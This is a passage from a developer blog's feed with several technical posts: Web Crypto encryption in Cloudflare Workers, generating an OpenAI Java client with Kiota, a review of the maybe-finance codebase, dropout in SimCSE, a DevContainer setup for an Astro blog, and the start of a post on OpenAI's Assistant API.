  combined.set(iv, 0);
  combined.set(new Uint8Array(encryptedData), iv.length);

  return arrayBufferToBase64(combined);
}

export async function decrypt(
  data: string,
  keyBase64Encoded: string
): Promise&amp;lt;string&amp;gt; {
  const keyBuffer = base64ToArrayBuffer(keyBase64Encoded);
  const dataBuffer = base64ToArrayBuffer(data);

  const iv = dataBuffer.slice(0, 12);
  const encrypted = dataBuffer.slice(12);

  const cryptoKey = await crypto.subtle.importKey(
    &quot;raw&quot;,
    keyBuffer,
    { name: algorithm, length: 256 },
    false,
    [&quot;decrypt&quot;]
  );

  const decrypted = await crypto.subtle.decrypt(
    { name: algorithm, iv: new Uint8Array(iv) },
    cryptoKey,
    encrypted
  );

  return new TextDecoder().decode(decrypted);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Testing the Implementation&lt;/h2&gt;
&lt;p&gt;Here&apos;s a test script to ensure the functionality works as expected:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// test/util/encryptor.server.test.ts
// test encrypt and decrypt

import { expect, test } from &quot;vitest&quot;;

import { encrypt, decrypt } from &quot;~/utils/encryptor.server&quot;;
import crypto from &quot;crypto&quot;;

test(&quot;encrypt and decrypt&quot;, async () =&amp;gt; {
  // random 32 bytes key
  const key = crypto.randomBytes(32);
  const data = &quot;test_data&quot;;

  const encrypted = await encrypt(data, key.toString(&quot;base64&quot;));

  const decrypted = await decrypt(encrypted, key.toString(&quot;base64&quot;));

  expect(decrypted).toBe(data);

  // data is encrypted
  expect(encrypted).not.toBe(data);

  // cannot decrypt with wrong key
  const wrongKey = crypto.randomBytes(32);
  // wrong decryption will throw error
  await expect(
    decrypt(encrypted, wrongKey.toString(&quot;base64&quot;))
  ).rejects.toThrow();
});
&lt;/code&gt;&lt;/pre&gt;
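&lt;p&gt;The test above uses Node&apos;s &lt;code&gt;crypto&lt;/code&gt; module to create the key, but a matching 256-bit key can also be generated with Web APIs alone, which fits the same Workers constraint. A minimal sketch:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Generate a random 256-bit key and base64-encode it using only Web APIs
// (crypto.getRandomValues and btoa), so this also runs on Cloudflare Workers.
const keyBytes = crypto.getRandomValues(new Uint8Array(32));
const keyBase64 = btoa(String.fromCharCode(...keyBytes));
// keyBase64 is the string expected by encrypt() and decrypt() above
&lt;/code&gt;&lt;/pre&gt;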
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The Web Crypto API provides a powerful, platform-independent tool for encrypting and decrypting sensitive information, even within restricted environments like Cloudflare Workers.&lt;/p&gt;
&lt;p&gt;Note: The code provided in this article does not guarantee operational security. Please use it at your own risk.&lt;/p&gt;
&lt;h3&gt;References&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Web/API/Web_Crypto_API&quot;&gt;Web Crypto API - Web APIs | MDN&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Revisiting: Generating OpenAI API Client with Kiota from OpenAPI Spec</title><link>https://ainoya.dev/posts/openaai-java-api-client-again/</link><guid isPermaLink="true">https://ainoya.dev/posts/openaai-java-api-client-again/</guid><description>Exploring the generation of an OpenAI API client using Microsoft Kiota from the OpenAPI specification.</description><pubDate>Wed, 07 Feb 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;In a previous exploration, I utilized the openapi-generator tool to create a &lt;a href=&quot;https://github.com/ainoya/openai-java-generated-client&quot;&gt;Java client&lt;/a&gt; for the OpenAI API. Recently, I discovered another generator named &lt;a href=&quot;https://github.com/microsoft/kiota&quot;&gt;Microsoft Kiota&lt;/a&gt;, prompting me to investigate whether it could offer a more user-friendly experience for generating API clients.&lt;/p&gt;
&lt;p&gt;Just like before, modifications to the original OpenAI OpenAPI specification were necessary, but I successfully generated the client. The resulting work is available at &lt;a href=&quot;https://github.com/ainoya/openai-kiota-client-java&quot;&gt;ainoya/openai-kiota-client-java&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Generating the client with Kiota is straightforward and done entirely from the command line. A notable difference from openapi-generator is that far fewer options are required during code generation, which reduces cognitive load: a welcome change.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;docker run -v ${PWD}:/app/output \
        -v /${PWD}/openapi.yaml:/app/openapi.yaml \
        mcr.microsoft.com/openapi/kiota generate \
        -d /app/openapi.yaml \
        --language java \
        -n dev.ainoya.kiota.openai.generated \
        -o /app/output/src/main/java/dev/ainoya/kiota/openai/generated
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The detailed modifications to the OpenAPI spec can be seen by comparing diffs in the repository, but key changes include adding a &lt;code&gt;discriminator&lt;/code&gt; to enable type mapping, which eliminates generator warnings. OpenAI&apos;s API server appears to be written in Python, and the typing of its responses is generally loose.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     ChatCompletionRequestMessage:
+      discriminator:
+        propertyName: role
       oneOf:
         - $ref: &quot;#/components/schemas/ChatCompletionRequestSystemMessage&quot;
         - $ref: &quot;#/components/schemas/ChatCompletionRequestUserMessage&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For cases where the API could return either a string or an object, making it difficult to define a discriminator, I opted to comment out the string variant. This is a workaround for the API&apos;s loose type constraints on certain parameters; as an API consumer, I would prefer stricter typing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@@ -5616,11 +5620,11 @@ components:

         `none` is the default when no functions are present. `auto` is the default if functions are present.
       oneOf:
-        - type: string
-          description: &amp;gt;
-            `none` means the model will not call a function and instead generates a message.
-            `auto` means the model can pick between generating a message or calling a function.
-          enum: [none, auto]
+#        - type: string
+#          description: &amp;gt;
+#            `none` means the model will not call a function and instead generates a message.
+#            `auto` means the model can pick between generating a message or calling a function.
+#          enum: [none, auto]
         - $ref: &quot;#/components/schemas/ChatCompletionNamedToolChoice&quot;
       x-oaiExpandable: true
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;The Usability of the Generated Code&lt;/h2&gt;
&lt;p&gt;Utilizing Kiota brings several benefits, as highlighted in the &lt;a href=&quot;https://learn.microsoft.com/ja-jp/openapi/kiota/overview&quot;&gt;official documentation&lt;/a&gt;, including reduced maintenance cost across different language SDKs, less redundancy in templates, and a consistent feature set across languages. These advantages mainly benefit SDK developers but indirectly enhance the experience for SDK consumers by providing well-maintained tools.&lt;/p&gt;
&lt;p&gt;An example of using the generated code for a Chat completion request is straightforward and similar to using code generated by openapi-generator, but with less boilerplate, such as not needing to write &lt;code&gt;setActualInstance&lt;/code&gt; methods. This simplicity could be seen as a significant advantage of Kiota.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;package dev.ainoya.kiota.openai.example;

import com.microsoft.kiota.ApiException;
import com.microsoft.kiota.authentication.AccessTokenProvider;
import com.microsoft.kiota.authentication.AllowedHostsValidator;
import com.microsoft.kiota.authentication.BaseBearerTokenAuthenticationProvider;
import com.microsoft.kiota.http.OkHttpRequestAdapter;
import com.microsoft.kiota.serialization.*;
import dev.ainoya.kiota.openai.generated.ApiClient;
import dev.ainoya.kiota.openai.generated.models.*;
import okhttp3.*;
import okhttp3.logging.HttpLoggingInterceptor;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;

import java.net.URI;
import java.util.List;
import java.util.Map;

class ExampleBearerTokenProvider implements AccessTokenProvider {
    // https://learn.microsoft.com/en-us/openapi/kiota/authentication?tabs=java

    @NotNull
    @Override
    public String getAuthorizationToken(@NotNull URI uri, @Nullable Map&amp;lt;String, Object&amp;gt; additionalAuthenticationContext) {
        // get token from env variable &quot;OPENAI_API_KEY&quot;
        return System.getenv(&quot;OPENAI_API_KEY&quot;);
    }

    @NotNull
    @Override
    public AllowedHostsValidator getAllowedHostsValidator() {
        return new AllowedHostsValidator(
                &quot;openai.com&quot;
        );
    }
}

public class ExampleApp {

    public static void main(String[] args) {
        final BaseBearerTokenAuthenticationProvider authProvider = new BaseBearerTokenAuthenticationProvider(new ExampleBearerTokenProvider());

        HttpLoggingInterceptor logging = new HttpLoggingInterceptor().setLevel(
                HttpLoggingInterceptor.Level.BASIC
                // if the level is set to BODY, the kiota client will not work because the response body is consumed by the interceptor
        );

        Call.Factory httpClient = new OkHttpClient.Builder()
                .addNetworkInterceptor(logging)
                .build();

        ParseNodeFactory parseNodeFactory = ParseNodeFactoryRegistry.defaultInstance;
        SerializationWriterFactory serializationWriterFactory = SerializationWriterFactoryRegistry.defaultInstance;
        final OkHttpRequestAdapter requestAdapter = new OkHttpRequestAdapter(authProvider,
                null,
                null,
                httpClient
        );


        ApiClient client = new ApiClient(requestAdapter);

        final CreateChatCompletionRequest request = getCreateChatCompletionRequest();

        try {
            CreateChatCompletionResponse post = client
                    .chat().completions().post(request);

            // debug response
            if (post != null) {
                var choices = post.getChoices();
                if (choices != null) {
                    for (var choice : choices) {
                        if (choice.getMessage() != null) {
                            System.out.println(choice.getMessage().getContent());
                        }
                    }
                } else {
                    System.out.println(&quot;choices is null&quot;);
                }
            } else {
                System.out.println(&quot;post is null&quot;);
            }
        } catch (ApiException e) {
            // handle as ApiException
            System.out.println(e.getLocalizedMessage());
        }

    }

    @NotNull
    private static CreateChatCompletionRequest getCreateChatCompletionRequest() {
        final CreateChatCompletionRequest request = new CreateChatCompletionRequest();

        final CreateChatCompletionRequest.CreateChatCompletionRequestModel model = new CreateChatCompletionRequest.CreateChatCompletionRequestModel();
        model.setString(&quot;gpt-4-turbo-preview&quot;);

        request.setModel(
                model
        );

        request.setMaxTokens(100);


        ChatCompletionRequestMessage message = new ChatCompletionRequestMessage();
        ChatCompletionRequestUserMessage userMessage = new ChatCompletionRequestUserMessage();

        ChatCompletionRequestMessageContentPart contentPart = new ChatCompletionRequestMessageContentPart();

        ChatCompletionRequestMessageContentPartText partText = new ChatCompletionRequestMessageContentPartText();
        partText.setText(&quot;What is the meaning of life?&quot;);
        partText.setType(ChatCompletionRequestMessageContentPartTextType.Text);

        contentPart.setChatCompletionRequestMessageContentPartText(
                partText
        );

        userMessage.setContent(List.of(
                contentPart
        ));

        userMessage.setRole(
                ChatCompletionRequestUserMessageRole.User
        );

        message.setChatCompletionRequestUserMessage(userMessage);
        List&amp;lt;ChatCompletionRequestMessage&amp;gt; messages = List.of(
                message
        );

        request.setMessages(
                messages
        );
        return request;
    }
}
&lt;/code&gt;&lt;/pre&gt;
</content:encoded></item><item><title>Deep Dive into maybe-finance/maybe</title><link>https://ainoya.dev/posts/read-maybe-finance/</link><guid isPermaLink="true">https://ainoya.dev/posts/read-maybe-finance/</guid><description>Explore the architecture, libraries, and design of the open-source project maybe-finance/maybe, revealing insights into modern app development.</description><pubDate>Thu, 01 Feb 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;A startup that was developing a personal asset management app recently ceased operations. However, in a commendable move, they have open-sourced their service on GitHub. You can find the repository at &lt;a href=&quot;https://github.com/maybe-finance/maybe&quot;&gt;maybe-finance/maybe&lt;/a&gt;. From the README, it&apos;s apparent that they invested over $1,000,000 in developing the app. It&apos;s quite rare to see large-scale, production-grade application code like this released to the public. With an interest in studying modern application development techniques, I delved into the code and structure of maybe-finance/maybe.&lt;/p&gt;
&lt;h2&gt;Overview of the Structure&lt;/h2&gt;
&lt;p&gt;According to their &lt;a href=&quot;https://github.com/maybe-finance/maybe/wiki/Monorepo-File-Structure-Overview&quot;&gt;Monorepo File Structure Overview&lt;/a&gt;, both the backend and the frontend are written in TypeScript. The repository adopts a monorepo structure managed with Nx, which offers a rich plugin ecosystem. For monorepo projects built around Next.js, &lt;a href=&quot;https://turbo.build/&quot;&gt;turborepo&lt;/a&gt; is also worth considering, especially since it is backed by Vercel.&lt;/p&gt;
&lt;p&gt;As of commit &lt;code&gt;0575beb5138a3f7644a69b0d7a76fad96b1f8d84&lt;/code&gt;, the directory tree is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ tree -d -L 2
.
├── apps
│   ├── client
│   ├── e2e
│   ├── server
│   └── workers
├── libs
│   ├── client
│   ├── design-system
│   ├── server
│   ├── shared
│   └── teller-api
├── prisma
│   └── migrations
└── tools
    ├── generators
    ├── pages
    ├── scripts
    └── test-data
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The GitHub wiki includes a decision tree guide on where to place which type of code. Such visual guides are invaluable for developers joining a project with an extensive directory structure.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/read-maybe-finance/images/decision-tree.png&quot; alt=&quot;Decision Tree&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/maybe-finance/maybe/wiki/Monorepo-File-Structure-Overview&quot;&gt;Monorepo File Structure Overview · maybe-finance/maybe Wiki&lt;/a&gt;&lt;/p&gt;
&lt;h2&gt;Used Libraries&lt;/h2&gt;
&lt;h3&gt;Frontend&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;React Framework: &lt;a href=&quot;https://nextjs.org/&quot;&gt;Next.js&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CSS Framework: &lt;a href=&quot;https://tailwindcss.com/&quot;&gt;tailwind&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://headlessui.com/&quot;&gt;headless UI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Testing Frameworks: jest, react-testing-library, cypress&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Backend&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Database: PostgreSQL&lt;/li&gt;
&lt;li&gt;ORM: &lt;a href=&quot;https://www.prisma.io/&quot;&gt;prisma&lt;/a&gt;, with shared data model definitions between client and server.&lt;/li&gt;
&lt;li&gt;Web Application Framework: Express. A few backend routes are implemented in Next.js, using the Prisma client to access the DB directly, but most of the backend is built on Express.&lt;/li&gt;
&lt;li&gt;Worker: &lt;a href=&quot;https://optimalbits.github.io/bull/&quot;&gt;Bull&lt;/a&gt;, a job queue library for Node.js that uses Redis for job management. It&apos;s used for asynchronous processing of communications with external services like &lt;a href=&quot;https://teller.io/&quot;&gt;Teller&lt;/a&gt;, improving system stability and UX. It also functions as a cron scheduler.&lt;/li&gt;
&lt;li&gt;Necessary middleware configurations are available in the &lt;a href=&quot;https://github.com/maybe-finance/maybe/blob/0575beb5138a3f7644a69b0d7a76fad96b1f8d84/docker-compose.yml#L1&quot;&gt;docker-compose.yml&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Software Design&lt;/h2&gt;
&lt;h3&gt;Frontend&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Utilizes Next.js&apos;s Page Router mode, operating in SSR. A &lt;code&gt;vercel.json&lt;/code&gt; suggests hosting on Vercel.&lt;/li&gt;
&lt;li&gt;Components that can be separated are modularized and managed with Storybook. This keeps component semantics clear, since long strings of Tailwind class names can otherwise become hard to read.&lt;/li&gt;
&lt;li&gt;Avoids complex state management frameworks like Redux or Jotai, instead using a combination of hooks and react-query for simple state management. This approach is sufficient until the complexity of state management becomes an issue.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Backend&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Actively uses Constructor Injection for &lt;a href=&quot;https://github.com/maybe-finance/maybe/blob/0575beb5138a3f7644a69b0d7a76fad96b1f8d84/apps/workers/src/app/lib/di.ts#L174&quot;&gt;DI&lt;/a&gt;. For instance, the IQueueFactory interface, implemented by classes like InMemoryQueueFactory and BullQueueFactory, makes it easy to swap the persistence layer for an in-memory one during testing and debugging. Interfaces and their implementations use the &lt;code&gt;class&lt;/code&gt; &lt;a href=&quot;https://github.com/maybe-finance/maybe/blob/0575beb5138a3f7644a69b0d7a76fad96b1f8d84/libs/server/shared/src/services/queue/bull-queue.ts#L160&quot;&gt;syntax&lt;/a&gt;. This DI style will feel familiar to anyone who mainly works on backend development. Factory functions are also a common way to construct such objects in TypeScript, and the choice between the two approaches is largely a matter of project convention.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;DI Using Class&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;interface KVStore {
    get(key: string): Promise&amp;lt;string | null&amp;gt;;
    set(key: string, value: string): Promise&amp;lt;void&amp;gt;;
}

class RedisKVStore implements KVStore {
    // Initialization of the Redis client, etc.

    async get(key: string): Promise&amp;lt;string | null&amp;gt; {
        // Logic to retrieve the value from Redis
        return null; // placeholder so the sketch type-checks
    }

    async set(key: string, value: string): Promise&amp;lt;void&amp;gt; {
        // Logic to set the value in Redis
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;DI Using Factory Method&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;type KVStore = {
    get: (key: string) =&amp;gt; Promise&amp;lt;string | null&amp;gt;;
    set: (key: string, value: string) =&amp;gt; Promise&amp;lt;void&amp;gt;;
};

function createRedisKVStore(): KVStore {
    return {
        async get(key: string): Promise&amp;lt;string | null&amp;gt; {
            // Logic to retrieve the value from Redis
            return null; // placeholder so the sketch type-checks
        },
        async set(key: string, value: string): Promise&amp;lt;void&amp;gt; {
            // Logic to set the value in Redis
        }
    };
}
&lt;/code&gt;&lt;/pre&gt;
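&lt;p&gt;Either style pays off at test time, because any implementation of the interface can be injected. The sketch below is my own illustration (it is not code from the maybe codebase; only the &lt;code&gt;KVStore&lt;/code&gt; shape follows the snippets above) showing an in-memory store swapped in for a service under test:&lt;/p&gt;

```typescript
type KVStore = {
    get: (key: string) => Promise<string | null>;
    set: (key: string, value: string) => Promise<void>;
};

// In-memory implementation, handy for tests and local debugging
function createInMemoryKVStore(): KVStore {
    const data = new Map<string, string>();
    return {
        async get(key: string): Promise<string | null> {
            return data.get(key) ?? null;
        },
        async set(key: string, value: string): Promise<void> {
            data.set(key, value);
        },
    };
}

// The service receives its store via constructor injection, so it
// never knows whether Redis or a plain Map sits behind the interface
class SessionService {
    constructor(private readonly store: KVStore) {}

    async remember(userId: string, token: string): Promise<void> {
        await this.store.set(`session:${userId}`, token);
    }

    async recall(userId: string): Promise<string | null> {
        return this.store.get(`session:${userId}`);
    }
}

async function main(): Promise<void> {
    const service = new SessionService(createInMemoryKVStore());
    await service.remember("user-1", "abc123");
    console.log(await service.recall("user-1")); // abc123
    console.log(await service.recall("user-2")); // null
}

main();
```

&lt;p&gt;In production code the only change is the argument passed to the constructor, which is exactly the property that makes the BullQueueFactory/InMemoryQueueFactory pair in the repository work.&lt;/p&gt;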
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The code is well-organized and consistently designed. The inclusion of generator code and docker-compose reflects a consideration for easy onboarding. A monorepo structure allows for a comprehensive overview with a single repository checkout. However, as the codebase expands, that at-a-glance visibility diminishes, making documents like the decision tree crucial for understanding.&lt;/li&gt;
&lt;li&gt;I plan to continue exploring and writing about interesting OSS products, much like this analysis.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Update on 2024/02/07&lt;/h2&gt;
&lt;p&gt;A significant rewrite from React/Next.js to Ruby on Rails is underway at &lt;a href=&quot;https://github.com/maybe-finance/maybe/tree/40997431072c37fb301b024cc0e3212b072ac556#moving-from-reactnextjs-to-ruby-on-rails&quot;&gt;maybe-finance/maybe&lt;/a&gt;.&lt;/p&gt;
</content:encoded></item><item><title>Where is Dropout Configured in SimCSE?</title><link>https://ainoya.dev/posts/simcse-dropout/</link><guid isPermaLink="true">https://ainoya.dev/posts/simcse-dropout/</guid><description>Dropout is incorporated within the Transformer</description><pubDate>Sun, 28 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;In the unsupervised learning approach of SimCSE, two identical sentences are vectorized using the Transformer encoder to train a sentence embedding model. A key aspect of this process is the role of Dropout settings within the Transformer, which act as &apos;noise&apos;. This noise ensures that, even though the two sentences are the same, they generate distinct vectors during training. This concept, as discussed in the paper, functions similarly to contrastive learning in image recognition, applying effectively to natural language learning.&lt;/p&gt;
&lt;p&gt;While studying SimCSE, I initially encountered confusion regarding the implementation of Dropout. My initial assumption was that Dropout would be configured in the head part of the model that compares the two sentences during training, possibly in an MLP (Multi-Layer Perceptron). However, a closer reading of the paper clarified that the Dropout referred to is actually the one within the internal layers of the Transformer. This realization resolved my confusion.&lt;/p&gt;
&lt;p&gt;For instance, in models like BERT, Dropout is configured in various layers including the attention and forward layers, as shown in the following code snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from transformers import AutoModel

base_model_name = &quot;cl-tohoku/bert-base-japanese-v3&quot;
testmodel = AutoModel.from_pretrained(base_model_name)

print(testmodel)
# BertModel(
#   (embeddings): BertEmbeddings(
#     (word_embeddings): Embedding(32768, 768, padding_idx=0)
#     (position_embeddings): Embedding(512, 768)
#     (token_type_embeddings): Embedding(2, 768)
#     (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#     (dropout): Dropout(p=0.1, inplace=False)
#   )
#   (encoder): BertEncoder(
#     (layer): ModuleList(
#       (0-11): 12 x BertLayer(
#         (attention): BertAttention(
#           (self): BertSelfAttention(
#             (query): Linear(in_features=768, out_features=768, bias=True)
#             (key): Linear(in_features=768, out_features=768, bias=True)
#             (value): Linear(in_features=768, out_features=768, bias=True)
#             (dropout): Dropout(p=0.1, inplace=False)
#           )
#           (output): BertSelfOutput(
#             (dense): Linear(in_features=768, out_features=768, bias=True)
#             (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#             (dropout): Dropout(p=0.1, inplace=False)
#           )
#         )
#         (intermediate): BertIntermediate(
#           (dense): Linear(in_features=768, out_features=3072, bias=True)
#           (intermediate_act_fn): GELUActivation()
#         )
#         (output): BertOutput(
#           (dense): Linear(in_features=3072, out_features=768, bias=True)
#           (LayerNorm): LayerNorm((768,), eps=1e-12, elementwise_affine=True)
#           (dropout): Dropout(p=0.1, inplace=False)
#         )
#       )
#     )
#   )
#   (pooler): BertPooler(
#     (dense): Linear(in_features=768, out_features=768, bias=True)
#     (activation): Tanh()
#   )
# )

&lt;/code&gt;&lt;/pre&gt;
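&lt;p&gt;The mechanism itself is easy to reproduce outside of any ML framework. The following sketch is purely illustrative (it is not SimCSE or Transformer code): the same vector passes twice through an inverted-dropout function in &quot;training mode&quot;, and because the random masks differ, the two outputs are distinct yet still similar — exactly the positive pair that unsupervised SimCSE trains on:&lt;/p&gt;

```typescript
// Inverted dropout: zero each unit with probability p and scale the
// survivors by 1/(1-p) so the expected value of the output is unchanged
function dropout(x: number[], p: number): number[] {
    return x.map((v) => (Math.random() < p ? 0 : v / (1 - p)));
}

// Cosine similarity between two vectors of equal length
function cosine(a: number[], b: number[]): number {
    let dot = 0, na = 0, nb = 0;
    for (let i = 0; i < a.length; i++) {
        dot += a[i] * b[i];
        na += a[i] * a[i];
        nb += b[i] * b[i];
    }
    return dot / (Math.sqrt(na) * Math.sqrt(nb));
}

// The "sentence representation" before dropout: identical both times
const h = Array.from({ length: 768 }, (_, i) => Math.sin(i));

// Two forward passes with dropout active yield two distinct vectors
const z1 = dropout(h, 0.1);
const z2 = dropout(h, 0.1);

console.log(z1.some((v, i) => v !== z2[i])); // true: the vectors differ
console.log(cosine(z1, z2) > 0.5);           // true: but remain similar
```

&lt;p&gt;In the real model, the randomness comes from the &lt;code&gt;Dropout(p=0.1)&lt;/code&gt; modules inside the encoder layers shown above, not from any extra head added for training.&lt;/p&gt;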
&lt;p&gt;This aspect of Dropout configuration is a common point of confusion, as evidenced by the numerous related issues raised in the GitHub repository of the SimCSE paper: &lt;a href=&quot;https://github.com/search?q=repo%3Aprinceton-nlp%2FSimCSE+dropout&amp;amp;type=issues&quot;&gt;SimCSE GitHub Issues&lt;/a&gt;. It&apos;s a subtle yet critical detail worth noting for anyone delving into this area.&lt;/p&gt;
&lt;p&gt;Reference:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/abs/2104.08821&quot;&gt;SimCSE: Simple Contrastive Learning of Sentence Embeddings&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Improving Blog-Writing Workflow with VSCode&apos;s DevContainer and Astro</title><link>https://ainoya.dev/posts/astro-blog-with-devcontainer/</link><guid isPermaLink="true">https://ainoya.dev/posts/astro-blog-with-devcontainer/</guid><description>Use devcontainer to streamline the hassle of starting a local development server while writing a blog.</description><pubDate>Tue, 23 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;In pursuit of an efficient development workflow for my personal blog, ainoya.dev, I experimented with leveraging the capabilities of VSCode&apos;s DevContainer feature. This post details the journey of enhancing my blog development process, primarily using Astro, by integrating DevContainer into my workflow.&lt;/p&gt;
&lt;h2&gt;Introduction to DevContainer&lt;/h2&gt;
&lt;p&gt;VSCode&apos;s &lt;a href=&quot;https://code.visualstudio.com/docs/devcontainers/containers&quot;&gt;DevContainer&lt;/a&gt; offers a seamless way to containerize the development environment. This means consistent, isolated, and replicable development settings for any project. Utilizing this for my blog, written using Astro, presented an opportunity to streamline the setup and reduce startup times for the development server.&lt;/p&gt;
&lt;h2&gt;Setting Up DevContainer for Astro&lt;/h2&gt;
&lt;p&gt;The &lt;code&gt;.devcontainer/devcontainer.json&lt;/code&gt; file is the heart of configuring the DevContainer environment. I tailored the settings to cater to my Astro blog&apos;s needs, as illustrated below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
    &quot;name&quot;: &quot;Node.js &amp;amp; TypeScript&quot;,
    &quot;image&quot;: &quot;mcr.microsoft.com/devcontainers/typescript-node:1-20-bullseye&quot;,
    &quot;forwardPorts&quot;: [4321],
    &quot;portsAttributes&quot;: {
        &quot;4321&quot;: {
            &quot;label&quot;: &quot;Astro&quot;,
            &quot;onAutoForward&quot;: &quot;openBrowser&quot;
        }
    },
    &quot;postCreateCommand&quot;: &quot;pnpm config set store-dir /home/node/.local/share/pnpm/store &amp;amp;&amp;amp; pnpm install --frozen-lockfile&quot;,
    &quot;postStartCommand&quot;: &quot;nohup bash -c &apos;pnpm run dev &amp;amp;&apos;&quot;,
    &quot;remoteUser&quot;: &quot;node&quot;,
    &quot;customizations&quot;: {
        &quot;vscode&quot;: {
            &quot;extensions&quot;: [&quot;astro-build.astro-vscode&quot;]
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This configuration automatically starts the Astro development server in the background upon container startup, significantly reducing the waiting time.&lt;/p&gt;
&lt;h2&gt;Resolving &lt;code&gt;pnpm install&lt;/code&gt; Issues on macOS and devcontainer&lt;/h2&gt;
&lt;p&gt;The primary issue arose when running &lt;code&gt;pnpm install&lt;/code&gt; within the DevContainer on macOS. The error message was &lt;code&gt;ERR_PNPM_LINKING_FAILED&lt;/code&gt;, indicating a failure in the linking process during installation. This problem seemed unique to the macOS environment, particularly when used in conjunction with Docker.&lt;/p&gt;
&lt;h3&gt;Understanding the Cause&lt;/h3&gt;
&lt;p&gt;The root cause of this issue is tied to the way Docker interacts with the macOS file system. More specifically, it&apos;s related to how pnpm uses hard links to optimize dependency installations. Hard links behave differently in Docker&apos;s virtualized file system on macOS than in Linux containers, leading to the &lt;code&gt;ERR_PNPM_LINKING_FAILED&lt;/code&gt; error while files are being copied. (&lt;a href=&quot;https://github.com/misskey-dev/misskey/issues/10201&quot;&gt;ref&lt;/a&gt;)&lt;/p&gt;
&lt;h2&gt;Implementing a Solution&lt;/h2&gt;
&lt;p&gt;To address this, I modified the pnpm configuration to change the storage directory of the package store. This was achieved by adding a specific command in the &lt;code&gt;postCreateCommand&lt;/code&gt; section of the DevContainer configuration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&quot;postCreateCommand&quot;: &quot;pnpm config set store-dir /home/node/.local/share/pnpm/store &amp;amp;&amp;amp; pnpm install --frozen-lockfile&quot;,
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After changing the pnpm store directory, it was essential to add the new store directory, &lt;code&gt;.pnpm-store&lt;/code&gt;, to the &lt;code&gt;.gitignore&lt;/code&gt; file.&lt;/p&gt;
</content:encoded></item><item><title>Using OpenAI&apos;s Assistant API with Function Calling in Chatbots</title><link>https://ainoya.dev/posts/openai-assistant-api-and-function-calling/</link><guid isPermaLink="true">https://ainoya.dev/posts/openai-assistant-api-and-function-calling/</guid><description>A common pattern in chatbot conversations involving function calling within the backend during interactions with an OpenAI Assistant API.</description><pubDate>Sun, 21 Jan 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;In this post, I&apos;ll explain a common pattern in chatbot conversations involving function calling within the backend during interactions with an OpenAI Assistant API. This approach offers significant advantages in maintaining context and structuring responses. We&apos;ll delve into the benefits of using the &lt;a href=&quot;https://platform.openai.com/docs/assistants/overview&quot;&gt;Assistant API&lt;/a&gt; and &lt;a href=&quot;https://platform.openai.com/docs/guides/function-calling&quot;&gt;Function Calling&lt;/a&gt;, as well as the sequence of chat interactions and operational considerations.&lt;/p&gt;
&lt;h2&gt;Benefits of the Assistant API&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Thread Creation for Individual Users&lt;/strong&gt;: The Assistant API enables the creation of threads for each user, maintaining the context of conversations. This is crucial in providing a cohesive and personalized chat experience.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Setting Instructions for the Assistant&lt;/strong&gt;: The ability to set instructions for the assistant allows for more controlled and relevant responses, tailored to the specific needs of the application.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
